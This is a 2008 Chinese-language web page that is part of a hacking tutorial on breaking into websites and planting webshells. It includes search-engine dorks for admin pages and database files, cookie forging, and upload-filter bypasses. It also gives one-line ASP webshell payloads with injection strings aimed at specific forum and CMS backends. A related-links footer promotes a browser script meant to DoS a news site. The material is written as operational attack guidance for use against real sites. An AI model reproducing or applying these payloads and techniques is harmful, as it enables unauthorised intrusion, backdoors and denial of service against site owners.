非常不錯(cuò)的腳本入侵基礎(chǔ)知識(shí)總結(jié)第2/2頁(yè)
更新時(shí)間:2008年06月14日 19:51:12 作者:
簡(jiǎn)單的說(shuō)來(lái),webshell就是一個(gè)asp或php木馬后門,黑客在入侵了一個(gè)網(wǎng)站后,常常在將這些 asp或php木馬后門文件放置在網(wǎng)站服務(wù)器的web目錄中,與正常的網(wǎng)頁(yè)文件混在一起。
10.查看目錄法:人一些網(wǎng)站可以斷開(kāi)目錄,可以方問(wèn)目錄。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
這樣我們可以找到數(shù)據(jù)庫(kù),下載不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫(kù):database/flash.mdb 后臺(tái)/manager/
(2).找網(wǎng)站的管理后臺(tái)地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <關(guān)鍵字很多,自已找>
site:xxxx.cominurl:login
(3).查找access的數(shù)據(jù)庫(kù),mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE詐騙:
把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。這個(gè)我就不多講了
14.利用常見(jiàn)的漏洞:如動(dòng)網(wǎng)BBS
可以先用:dvbbs權(quán)限提升工具,使自已成為前臺(tái)管理員。
THEN,運(yùn)用:動(dòng)網(wǎng)固頂貼工具,找個(gè)固頂貼,再取得COOKIES,這個(gè)要你自已做。我們可以用WSockExpert取得Cookies/NC包
這個(gè)我就不做了,網(wǎng)上教程多的是,自已下個(gè)看看。
工具:dvbbs權(quán)限提升工具 動(dòng)網(wǎng)固頂貼工具
15.還有一些老漏洞。如IIS3,4的查看源碼,5的DELETE
CGI,PHP的一些老洞,我就不說(shuō)了啊。。太老了。沒(méi)有什么大用途。
三.從后臺(tái)得到webshell十大技巧大匯總
作者:出處:安全中國(guó)責(zé)任編輯: 原野 [ 2006-04-27 09:29 ]我們把常用的從后臺(tái)得到webshell的方法進(jìn)行了總結(jié)和歸納,大體情況有以下十大方面……
--------------------------------------------------------------------------------
重點(diǎn)推薦:黑客入侵實(shí)例
前 言
動(dòng)網(wǎng)上傳漏洞,相信大家拿下不少肉雞吧??梢哉f(shuō)是動(dòng)網(wǎng)讓upfile.asp上傳文件過(guò)濾不嚴(yán)的漏洞昭然天下,現(xiàn)在這種漏洞已經(jīng)基本比較難見(jiàn)到了,不排除一些小網(wǎng)站仍然存在此漏洞。在拿站過(guò)程中,我們經(jīng)常費(fèi)了九牛兩虎之力拿到管理員帳號(hào)和密碼,并順利進(jìn)入了后臺(tái),雖然此時(shí)與拿到網(wǎng)站webshell還有一步之遙,但還是有許多新手因想不出合適的方法而被拒之門外。因此,我們把常用的從后臺(tái)得到webshell的方法進(jìn)行了總結(jié)和歸納,大體情況有以下十大方面。
注意:如何進(jìn)入后臺(tái),不是本文討論范圍,其具體方法就不說(shuō)了,靠大家去自己發(fā)揮。此文參考了前人的多方面的資料和信息,在此一并表示感謝。
一、直接上傳獲得webshell
這種對(duì)php和jsp的一些程序比較常見(jiàn),MolyX BOARD就是其中一例,直接在心情圖標(biāo)管理上傳.php類型,雖然沒(méi)有提示,其實(shí)已經(jīng)成功了,上傳的文件url應(yīng)該是http://forums/images/smiles/下,前一陣子的聯(lián)眾游戲站和網(wǎng)易的jsp系統(tǒng)漏洞就可以直接上傳jsp文件。文件名是原來(lái)的文件名,bo-blog后臺(tái)可以可以直接上傳.php文件,上傳的文件路徑有提示。以及一年前十分流行的upfile.asp漏洞(動(dòng)網(wǎng)5.0和6.0、早期的許多整站系統(tǒng)),因過(guò)濾上傳文件不嚴(yán),導(dǎo)致用戶可以直接上傳webshell到網(wǎng)站任意可寫目錄中,從而拿到網(wǎng)站的管理員控制權(quán)限。
二、添加修改上傳類型
現(xiàn)在很多的腳本程序上傳模塊不是只允許上傳合法文件類型,而大多數(shù)的系統(tǒng)是允許添加上傳類型,bbsxp后臺(tái)可以添加asa asP類型,ewebeditor的后臺(tái)也可添加asa類型,通過(guò)修改后我們可以直接上傳asa后綴的webshell了,還有一種情況是過(guò)濾了.asp,可以添加.aspasp的文件類型來(lái)上傳獲得webshell。php系統(tǒng)的后臺(tái),我們可以添加.php.g1f的上傳類型,這是php的一個(gè)特性,最后的哪個(gè)只要不是已知的文件類型即可,php會(huì)將php.g1f作為.php來(lái)正常運(yùn)行,從而也可成功拿到shell。LeadBbs3.14后臺(tái)獲得webshell方法是:在上傳類型中增加asp ,注意,asp后面是有個(gè)空格的,然后在前臺(tái)上傳ASP馬,當(dāng)然也要在后面加個(gè)空格!
三、利用后臺(tái)管理功能寫入webshell
上傳漏洞基本上補(bǔ)的也差不多了,所以我們進(jìn)入后臺(tái)后還可以通過(guò)修改相關(guān)文件來(lái)寫入webshell。比較的典型的有dvbbs6.0,還有l(wèi)eadbbs2.88等,直接在后臺(tái)修改配置文件,寫入后綴是asp的文件。而LeadBbs3.14后臺(tái)獲得webshell另一方法是:添加一個(gè)新的友情鏈接,在網(wǎng)站名稱處寫上冰狐最小馬即可,最小馬前后要隨便輸入一些字符,http:\\網(wǎng)站\inc\IncHtm\BoardLink.asp就是我們想要的shell。
四、利用后臺(tái)管理向配置文件寫webshell
利用"""":""http://"等符號(hào)構(gòu)造最小馬寫入程序的配置文件,joekoe論壇,某某同學(xué)錄,沸騰展望新聞系統(tǒng),COCOON Counter統(tǒng)計(jì)程序等等,還有很多php程序都可以,COCOON Counter統(tǒng)計(jì)程序舉例,在管理郵箱處添上cnhacker@263.net":eval request(chr (35))//, 在配制文件中就是webmail="cnhacker@263.net\":eval request(chr(35))//",還有一種方法就是寫上 cnhacker@263.net"%><%eval request(chr(35))%><%',這樣就會(huì)形成前后對(duì)應(yīng),最小馬也就運(yùn)行了。<%eval request(chr(35))%>可以用lake2的eval發(fā)送端以及最新的2006 客戶端來(lái)連,需要說(shuō)明的是數(shù)據(jù)庫(kù)插馬時(shí)候要選前者。再如動(dòng)易2005,到文章中心管理-頂部菜單設(shè)置-菜單其它特效,插入一句話?cǎi)R"%><%execute request("l")%><%',保 存頂部欄目菜單參數(shù)設(shè)置成功后,我們就得到馬地址http://網(wǎng)站/admin/rootclass_menu_config.asp。
五、利用后臺(tái)數(shù)據(jù)庫(kù)備份及恢復(fù)獲得webshell
主要是利用后臺(tái)對(duì)access數(shù)據(jù)庫(kù)的“備份數(shù)據(jù)庫(kù)”或“恢復(fù)數(shù)據(jù)庫(kù)”功能,“備份的數(shù)據(jù)庫(kù)路徑”等變量沒(méi)有過(guò)濾導(dǎo)致可以把任意文件后綴改 為asp,從而得到webshell,msssql版的程序就直接應(yīng)用了access版的代碼,導(dǎo)致sql版照樣可以利用。還可以備份網(wǎng)站asp文件為其他后綴 如.txt文件,從而可以查看并獲得網(wǎng)頁(yè)源代碼,并獲得更多的程序信息增加獲得webshell的機(jī)會(huì)。在實(shí)際運(yùn)用中經(jīng)常會(huì)碰到?jīng)]有上傳功能的時(shí) 候,但是有asp系統(tǒng)在運(yùn)行,利用此方法來(lái)查看源代碼來(lái)獲得其數(shù)據(jù)庫(kù)的位置,為數(shù)據(jù)庫(kù)插馬來(lái)創(chuàng)造機(jī)會(huì),動(dòng)網(wǎng)論壇就有一個(gè)ip地址的數(shù)據(jù)庫(kù),在后臺(tái)的ip管理中可以插入最小馬然后備份成.asp文件即可。在談?wù)勍黄粕蟼鳈z測(cè)的方法,很多asp程序在即使改了后綴名后也會(huì)提示文件非法,通過(guò)在.asp文件頭加上gif89a修改后綴為gif來(lái)騙過(guò)asp程序檢測(cè)達(dá)到上傳的目的,還有一種就是用記事本打開(kāi)圖片文件,隨便粘貼一部分復(fù)制到asp木馬文件頭,修改gif后綴后上傳也可以突破檢測(cè),然后備份為.asp文件,成功得到webshell。
相關(guān)文章
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程
win2003下創(chuàng)建永遠(yuǎn)的隱藏帳戶的圖文教程...2007-11-11讓侮辱中國(guó)人的法國(guó)cnn網(wǎng)站完蛋
讓侮辱中國(guó)人的法國(guó)cnn網(wǎng)站完蛋?。?!只要你幫助打開(kāi)一個(gè)網(wǎng)頁(yè)?。? 如何DOS攻擊CNN網(wǎng)站? ?將這些文字復(fù)制,并保存成一個(gè)html文件,然后在瀏覽器中打開(kāi),按提示啟用腳本,然后,每隔3秒鐘將自動(dòng)連接一次cnn網(wǎng)站(注意,是自動(dòng)的,只要你不關(guān)閉瀏覽器窗口就可以了,也不會(huì)影響你的其它操作),如果全世界中國(guó)人聯(lián)合起來(lái),那么cnn網(wǎng)站絕對(duì)崩潰2008-04-04完全解剖安全帳號(hào)管理器(SAM)結(jié)構(gòu)
完全解剖安全帳號(hào)管理器(SAM)結(jié)構(gòu)...2007-11-11